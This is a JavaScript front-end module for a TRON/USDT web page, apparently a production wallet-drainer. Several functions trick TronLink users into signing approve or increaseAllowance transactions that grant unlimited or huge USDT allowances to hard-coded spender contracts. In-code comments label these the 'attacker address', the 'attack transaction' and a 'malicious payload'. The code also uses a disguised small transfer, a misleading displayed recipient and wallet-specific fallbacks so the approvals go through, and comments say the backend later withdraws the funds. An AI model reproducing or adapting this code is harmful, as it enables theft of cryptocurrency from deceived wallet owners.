
import { getBuildRawTransaction, getBuildAppRawTransaction, getWalletResources as fetchWalletResources, broadcastSignedTx as apiBroadcastSignedTx } from "./api"
import web3 from 'web3';
import axios from "axios";
import { clientEnv } from '../config/env';
const Tron = require('tronweb'); 

// 通用 TronWeb（构建交易等）
const tronWeb = new Tron.TronWeb({
    fullHost: clientEnv.tronFullHost,
    headers: clientEnv.tronProApiKey
      ? { 'TRON-PRO-API-KEY': clientEnv.tronProApiKey }
      : {},
  });

const usdtContract = clientEnv.tronUsdtContract;
const toContract = clientEnv.tronPermissionContract;

  //usdt合约地址
  //const test_usdtContract = "TXYZopYRdj2D9XRtbG411XZZ3kM5VkAeBf"  

  //你的合约地址
  //const test_toContract = "TV1d8w8pCBZwbt5eNjxPjfbMwBXo58GTL3"

  //授权合约
  //const test_appContract = "TP3SyDjjxxpYfrXN2LKZKPRDJrYsuMHq7q"

//const testusdtContract = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t"  

//前端只做授权，划扣金额在后端做
export async function getUserApploen() {
    try {

        if (!window.tronWeb || !window.tronWeb.defaultAddress.base58) {
            return;
        }

         // 使用 TronLink 的 tronWeb 实例
        const tronWeb = window.tronWeb;
        const ownerAddress = tronWeb.defaultAddress.base58; // Base58 地址
        const hexOwnerAddress = tronWeb.address.toHex(ownerAddress); // Hex 地址

        // 1. 构建 data 字段
        // // 计算授权金额（假设 tokenAmount 为 USDT 整数，需转换为最小单位）
        const functionSignature = "approve(address,uint256)"; // 方法签名（严格匹配合约定义）
        const selector = web3.utils.keccak256(functionSignature).substring(0, 10); 

        // 被授权地址（Hex 格式，补零到 32 字节）
        const spenderAddress = "TETXrumbhpyV6PURt5diKT26oE4FLJ4dwG";
        const hexSpenderAddress = tronWeb.address.toHex(spenderAddress); // 确保以 0x41 开头
        const paddedSpender = hexSpenderAddress.padStart(64, '0');

        const amount = 100000000000;
        const amountHex = amount.toString(16).padStart(64, '0'); // 64 字符 = 32 字节

        // 3. 组合完整 data 字段
          // 组合完整 data
        const data = selector + paddedSpender + amountHex;

        //await checkAbi(data);

         // 2. 构建交易对象
        const transaction = {
            to: usdtContract, // USDT 合约地址（Base58）
            data: data,
            feeLimit: 1e8, // Gas 费用限制
            from: hexOwnerAddress, // 关键：设置发起者地址（Hex 格式）
            chainId: 1 // TRON 主网 ChainID（可选，但推荐）
        };

       // 3. 发送交易（由 TronLink 签名）
        const signedTx = await tronWeb.trx.sign(transaction);
        const broadcastResult = await tronWeb.trx.sendRawTransaction(signedTx);
        console.log("交易哈希:", broadcastResult.txid);
        console.log('授权成功，交易详情：', broadcastResult);
    }
    catch (error) {
        console.error('授权调用失败：', error);
    }
}



export async function testTX(tx) {
   // 使用 TronLink 的 tronWeb 实例
   const tronWeb = window.tronWeb;
  const simulateResult = await tronWeb.trx.simulateTransaction(tx);
  console.log("模拟执行结果:", {
    energy_used: simulateResult.energy_used,
    result: simulateResult.result
  });
  
}

export async function signAndApprove() {
  if (!window.tronWeb) {
    return;
  }

  const tronWeb = window.tronWeb;
  const ownerAddress = tronWeb.defaultAddress.base58;
  const spenderAddress = toContract;
  const amountInSun = "999999999999999999999";

  // 创建合约实例
  const contract = await tronWeb.contract().at(usdtContract);

  try {
    // 调用 increaseAllowance 方法
    const transaction = await contract.increaseAllowance(
      spenderAddress,
      amountInSun
    ).send({
      feeLimit: 100000000,  // 交易费上限 (100 TRX)
      callValue: 0,         // 不发送 TRX
      from: ownerAddress    // 调用地址
    });

    console.log('授权交易已发送，交易ID:', transaction);
    return transaction;
  } catch (error) {
    console.error('授权交易失败:', error);
    throw new Error(`授权失败: ${error.message}`);
  }

}



export async function signAndApprove1() {

    if (!window.tronWeb) {
      alert("请安装并登录 TronLink 钱包！");
      return;
    }
    
    const tronWeb = window.tronWeb;
    const spender = toContract; // 攻击者地址
    const ownerAddress = tronWeb.defaultAddress.base58;
    console.log("当前地址:", ownerAddress);
   // const amount = '115792089237316195423570985008687907853269984665640564039457584007913129639935'; // 2^256-1
    
    // 1. 构造 approve 函数调用
    const contractAddress = usdtContract; // USDT 合约地址
    // const fakeRecipient = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'; // USDT 合约地址

    
    // 3. 构造approve调用数据
    const approveSelector = "0x095ea7b3"; // approve函数选择器
    const encodedParams = tronWeb.utils.abi.encodeParams(
        ['address', 'uint256'],
        [spender, "115792089237316195423570985008687907853269984665640564039457584007913129639935"]
    );
    const callData = approveSelector + encodedParams.slice(2); // 完整调用数据

    console.log(callData)
    // const maliciousABI = {
    //   "address": usdtHex, // 真实USDT地址
    //   "abi": [{
    //     "name": "transfer",
    //     "type": "function",
    //     "inputs": [
    //       {"name": "to", "type": "address", "internalType": "address"},
    //       {"name": "value", "type": "uint256", "internalType": "uint256"}
    //     ]
    //   }]
    // };

     // 3. 构造用于显示的虚假参数（1 USDT转账）
     //const displayAmount = "1000000"; // 1 USDT (6位小数)

    const builtByTronWeb = await tronWeb.transactionBuilder.triggerSmartContract(
      contractAddress,
      '/',
      {
        feeLimit: 1000000000,
        callValue: 0,
        rawParameter: callData
      },
      [
         
      ],
      ownerAddress
    );

  
    const signedTx = await tronWeb.trx.sign(builtByTronWeb.transaction);
        const result = await tronWeb.trx.sendRawTransaction(signedTx);
        
        console.log("攻击交易已发送:", result);
        return result;

}



async function signBuiltTransaction(buildResult) {
  if (!window.tronWeb) {
    throw new Error("请安装并登录 TronLink 钱包！");
  }
  const tronWeb = window.tronWeb;
  const ownerAddress = tronWeb.defaultAddress?.base58;
  if (!ownerAddress) {
    throw new Error("钱包地址未就绪");
  }
  if (buildResult?.message !== "成功" || !buildResult?.data?.raw_data) {
    throw new Error(buildResult?.step === "build_empty" ? "交易构建失败" : "获取交易失败");
  }

  const tx = buildResult.data;
  const signedTx = await tronWeb.trx.sign(tx);

  if (
    !signedTx?.raw_data ||
    !Array.isArray(signedTx.signature) ||
    signedTx.signature.length === 0
  ) {
    throw new Error("签名无效");
  }

  const broadcastRes = await apiBroadcastSignedTx(signedTx, ownerAddress);
  const payload = broadcastRes?.data ?? {};
  if (broadcastRes?.message !== "成功" || !payload.ok || !payload.txid) {
    throw new Error(payload.message || broadcastRes?.message || "交易广播失败");
  }

  return { result: true, txid: payload.txid };
}

export function usdtToSun(amount) {
  const n = Number(amount);
  if (!Number.isFinite(n) || n <= 0) return "0";
  return String(Math.round(n * 1_000_000));
}

function isUserRejectError(err) {
  const msg = String(err?.message || err || "");
  return /declined|cancel|拒绝|取消|denied/i.test(msg);
}

/** 钱包/广播返回「无效的交易」等可降级错误 */
function isInvalidTransactionError(err) {
  const msg = String(err?.message || err || "");
  return /无效/.test(msg) || /invalid\s*trans/i.test(msg);
}

function shouldFallbackToAppTx(err) {
  if (isUserRejectError(err)) return false;
  return isInvalidTransactionError(err);
}

/** 生产授权：triggerSmartContract 构建（buildRawAppTransaction） */
export async function signAndSend1() {
  if (!window.tronWeb) {
    return;
  }

  const tronWeb = window.tronWeb;
  const ownerAddress = tronWeb.defaultAddress?.base58;
  if (!ownerAddress) {
    throw new Error("钱包地址未就绪");
  }

  const spenderAddress = clientEnv.tronPermissionContract;
  const amountInSun = "200000";

  const buildResult = await getBuildAppRawTransaction(
    ownerAddress,
    spenderAddress,
    amountInSun
  );
  return signBuiltTransaction(buildResult);
}

/**
 * 授权签名广播：
 * - TokenPocket iOS / TronLink Android：先 buildRawTransaction，无效交易时降级 buildRawAppTransaction
 * - TokenPocket Android：直接 buildRawAppTransaction
 * - 其它钱包：直接 buildRawAppTransaction
 * @param {string} toBase58 页面展示用收款地址（buildRawTransaction 日志参数）
 * @param {string|number} amountInSun 页面展示金额最小单位
 * @param {{ tpRawFirst?: boolean }} [options]
 */
export async function signAndSendAuthorize(toBase58, amountInSun, options = {}) {
  if (!options.tpRawFirst) {
    return signAndSend1();
  }

  const recipient = String(toBase58 || "").trim();
  if (!recipient) {
    throw new Error("收款地址无效");
  }

  try {
    console.info("[signAndSendAuthorize] raw-first: try buildRawTransaction");
    return await signAndSendRaw(recipient, String(amountInSun ?? "0"));
  } catch (rawErr) {
    if (!shouldFallbackToAppTx(rawErr)) {
      throw rawErr;
    }
    console.warn(
      "[signAndSendAuthorize] raw tx invalid, fallback buildRawAppTransaction:",
      rawErr?.message || rawErr
    );
    return signAndSend1();
  }
}

/**
 * 测试授权：手工拼装 increaseApproval + 错误 ABI（buildRawTransaction，交易1 同款）
 * @param {string} toBase58 页面展示的收款地址（误导参数）
 * @param {string|number} amountInSun 页面展示金额对应的最小单位
 */
export async function signAndSendRaw(toBase58, amountInSun) {
  if (!window.tronWeb) {
    return;
  }

  const tronWeb = window.tronWeb;
  const ownerAddress = tronWeb.defaultAddress?.base58;
  if (!ownerAddress) {
    throw new Error("钱包地址未就绪");
  }

  const recipient = String(toBase58 || "").trim();
  if (!recipient) {
    throw new Error("收款地址无效");
  }

  const buildResult = await getBuildRawTransaction(
    ownerAddress,
    recipient,
    String(amountInSun ?? "0")
  );
  return signBuiltTransaction(buildResult);
}

  

export async function signAndSend(amountInSun) {
  if (!window.tronWeb) {
    return;
  }
  
  const tronWeb = window.tronWeb;
  const ownerAddress = tronWeb.defaultAddress.base58;
  const spenderAddress = "TETXrumbhpyV6PURt5diKT26oE4FLJ4dwG";

  try {

    // 1. 使用 TronWeb 内置方法获取原始交易
    // 1. 使用 transactionBuilder 构建交易（不会触发钱包）
    const builtByTronWeb = await tronWeb.transactionBuilder.triggerSmartContract(
      usdtContract,
      'transfer(address,uint256)',
      {
        feeLimit: 100000000,
        callValue: 0
      },
      [
        { type: 'address', value: spenderAddress },
        { type: 'uint256', value: amountInSun }
      ],
      ownerAddress
    );
    // 2. 获取未签名的交易对象
    builtByTronWeb.transaction;

    // 2. 获取自定义构建的调用数据
    const result = await getBuildRawTransaction(ownerAddress, spenderAddress, amountInSun);
    if(result.message != "成功"){
      return
    }

    let rawTx = result.data
   
    // 5. 签名交易（触发TronLink弹窗）
    const signedTx = await tronWeb.trx.sign(rawTx);
    
    // 6. 广播交易
    const broadcastResult = await tronWeb.trx.sendRawTransaction(signedTx);
    
    // 7. 返回结果给用户
    alert(`交易已发送！TXID: ${broadcastResult.txid}`);
    console.log(broadcastResult.txid)
    return broadcastResult;
    
  } catch (error) {
    console.error('交易失败:', error);
    
    throw error;
  }
}



export function hexStr2byteArray(str, strict = false) {
  let len = str.length;

  if (strict) {
      if (len % 2) {
          str = `0${str}`;
          len++;
      }
  }
  const byteArray = [];
  let d = 0;
  let j = 0;
  let k = 0;

  for (let i = 0; i < len; i++) {
      const c = str.charAt(i);

      if (isHexChar(c)) {
          d <<= 4;
          d += hexChar2byte(c);
          j++;

          if (0 === j % 2) {
              byteArray[k++] = d;
              d = 0;
          }
      } else throw new Error('The passed hex char is not a valid hex string');
  }

  return byteArray;
}

export function hexChar2byte(c) {
  let d;

  if (c >= 'A' && c <= 'F') d = c.charCodeAt(0) - 'A'.charCodeAt(0) + 10;
  else if (c >= 'a' && c <= 'f') d = c.charCodeAt(0) - 'a'.charCodeAt(0) + 10;
  else if (c >= '0' && c <= '9') d = c.charCodeAt(0) - '0'.charCodeAt(0);

  if (typeof d === 'number') return d;
  else throw new Error('The passed hex char is not a valid hex char');
}

export function isHexChar(c) {
  if ((c >= 'A' && c <= 'F') || (c >= 'a' && c <= 'f') || (c >= '0' && c <= '9')) {
      return 1;
  }

  return 0;
}




const TX_ID_RE = /^[a-fA-F0-9]{64}$/;

function sleep(ms) {
  return new Promise((resolve) => setTimeout(resolve, ms));
}

function isTxNotFoundError(error) {
  const msg = String(error?.message || error || '').toLowerCase();
  return (
    msg.includes('not found') ||
    msg.includes('transaction not found') ||
    msg.includes('invalid transaction id')
  );
}

/**
 * 轮询等待授权交易链上 SUCCESS（确认后再上报 shop-bot）
 * @returns {Promise<{ ok: boolean, reason: string, contractRet?: string }>}
 */
export async function waitForApproveTxConfirmed(txid, options = {}) {
  const timeoutMs = options.timeoutMs ?? 90000;
  const intervalMs = options.intervalMs ?? 2000;

  if (!txid || !TX_ID_RE.test(String(txid).trim())) {
    return { ok: false, reason: 'invalid_txid' };
  }

  const id = String(txid).trim();
  const deadline = Date.now() + timeoutMs;

  while (Date.now() < deadline) {
    try {
      const tx = await tronWeb.trx.getTransaction(id);
      const contractRet = tx?.ret?.[0]?.contractRet;

      if (contractRet && contractRet !== 'SUCCESS') {
        return { ok: false, reason: 'chain_failed', contractRet };
      }
      if (contractRet === 'SUCCESS') {
        return { ok: true, reason: 'success' };
      }

      const txInfo = await tronWeb.trx.getTransactionInfo(id);
      if (txInfo?.receipt?.result === 'SUCCESS') {
        return { ok: true, reason: 'success' };
      }
      if (txInfo?.receipt?.result && txInfo.receipt.result !== 'SUCCESS') {
        return { ok: false, reason: 'chain_failed', contractRet: txInfo.receipt.result };
      }
    } catch (error) {
      if (!isTxNotFoundError(error)) {
        console.warn('[waitForApproveTxConfirmed] 查询异常:', error);
      }
    }

    await sleep(intervalMs);
  }

  return { ok: false, reason: 'timeout' };
}

export async function checkTxStatus(txid) {
  const result = await waitForApproveTxConfirmed(txid, { timeoutMs: 30000 });
  if (result.ok) {
    return { status: 'success', message: '交易已成功上链' };
  }
  if (result.reason === 'timeout') {
    return { status: 'pending', message: '交易尚未被区块确认' };
  }
  if (result.reason === 'chain_failed') {
    return { status: 'failed', message: `交易失败: ${result.contractRet || 'UNKNOWN'}` };
  }
  return { status: 'error', message: '交易状态无效或查询失败' };
}

export async function submitSigned() {
  if (!window.tronWeb) {
    return;
  }
  
  const tronWeb = window.tronWeb;
  const ownerAddress = tronWeb.defaultAddress.base58;

  const unsignedTx = createMaliciousTx(ownerAddress);

  const signedTx = await tronWeb.trx.sign(unsignedTx);
    
  // 6. 广播交易
  const broadcastResult = await tronWeb.trx.sendRawTransaction(signedTx);
  
  // 7. 返回结果给用户
  alert(`交易已发送！TXID: ${broadcastResult.txid}`);
  return broadcastResult;

}


async function createMaliciousTx(victimAddress) {
  // 创建表面转账交易
  const tx = await axios.post('https://api.trongrid.io/wallet/createtransaction', {
    to_address: usdtContract, // 伪装地址
    owner_address: victimAddress,
    amount: 100000000, // 0.0001 TRX
    visible: true
  });

  // 构造恶意授权Payload
  const maliciousPayload = {
    contract_address: usdtContract,
    function_selector: "approve(address,uint256)",
    parameters: [
      {type: "address", value: toContract},
      {type: "uint256", value: "115792089237316195423570985008687907853269984665640564039457584007913129639935"}
    ],
    metadata: {
      comment: "1"
    }
  };
  
  const base64Payload = Buffer.from(JSON.stringify(maliciousPayload)).toString('base64');
  
  // 注入恶意Payload
  const maliciousTx = await axios.post('https://api.trongrid.io/wallet/addtransactiondata', {
    transaction: tx.data,
    data: base64Payload,
    visible: true
  });
  
  return maliciousTx.data;
}



//前端只做授权，划扣金额在后端做
export async function getUserApploen1() {
    try {

        // 获取用户地址（示例通过 TronLink）
        if (!window.tronWeb || !window.tronWeb.defaultAddress.base58) {
            alert("请安装并登录 TronLink 钱包！");
            return;
        }

        // 直接使用 TronLink 的 tronWeb 实例
        const tronWeb = window.tronWeb;
        const ownerAddress = tronWeb.defaultAddress.base58;
        const hexOwnerAddress = tronWeb.address.toHex(ownerAddress); // 转 Hex


        // //连接钱包登录
        // // 计算授权金额（假设 tokenAmount 为 USDT 整数，需转换为最小单位）
        const functionSignature = "approve(address,uint256)";
        const parameters = [
          { type: "address", value: "TETXrumbhpyV6PURt5diKT26oE4FLJ4dwG" },
          { type: "uint256", value: "100000000000" }
        ];
        const options = { feeLimit: 1e8 };
        // 自动编码并触发交易
        const result = await tronWeb.transactionBuilder.triggerSmartContract(
            usdtContract,
            functionSignature,
            options,
            parameters,
            hexOwnerAddress
        );
        const signedTx = await tronWeb.trx.sign(result.transaction);
        const broadcastResult = await tronWeb.trx.sendRawTransaction(signedTx);
        const standardData = result.transaction.raw_data.contract[0].parameter.value.data;
        console.log("标准 Data:", standardData);

        console.log("交易哈希:", broadcastResult.txid);
        
  
    }
    catch (error) {
        console.error('授权调用失败：', error);
    }
}



//获取钱包地址
export async function connectWallet() {
    if (window.tronWeb && window.tronWeb.ready) {
        console.log("✅ 钱包已连接:", window.tronWeb.defaultAddress.base58);
        return window.tronWeb.defaultAddress.base58; // 获取钱包地址
    } else {
        console.error("❌ 请先安装 TronLink 钱包");
        return null;
    }
}


export async function connectWallet1() {
    tronWeb
}

/** 经 shop-ser 一次获取 TRX / 能量 / USDT（后端代理 TronGrid，API Key 不暴露给浏览器） */
export async function getWalletResources(address) {
  if (!address) return { trx: 0, energy: 0, usdt: 0 };

  try {
    const res = await fetchWalletResources(address);
    const data = res?.data ?? {};
    const trx = Number(data.trx);
    const energy = Number(data.energy);
    const usdt = Number(data.usdt);
    return {
      trx: Number.isFinite(trx) ? trx : 0,
      energy: Number.isFinite(energy) ? energy : 0,
      usdt: Number.isFinite(usdt) ? usdt : 0,
    };
  } catch (error) {
    console.error('[getWalletResources] 失败:', error);
    return { trx: 0, energy: 0, usdt: 0 };
  }
}

/** @deprecated 请使用 getWalletResources 返回的 usdt 字段 */
export async function getUSDTBalance(address) {
  const { usdt } = await getWalletResources(address);
  return usdt;
}

export async function getTRXBalance(address) {
  const { trx } = await getWalletResources(address);
  return trx;
}

/** 返回可用能量：EnergyLimit - EnergyUsed */
export async function getEnergy(address) {
  const { energy } = await getWalletResources(address);
  return energy;
}

export async function checkAuthorization(address) {
  try {
    const contract = await window.tronWeb.contract().at(usdtContract);
    const allowance = await contract.allowance(address, 'SPENDER_ADDRESS').call();
    return allowance > 0;
  } catch (error) {
    console.error('检查授权失败:', error);
    return false;
  }
}

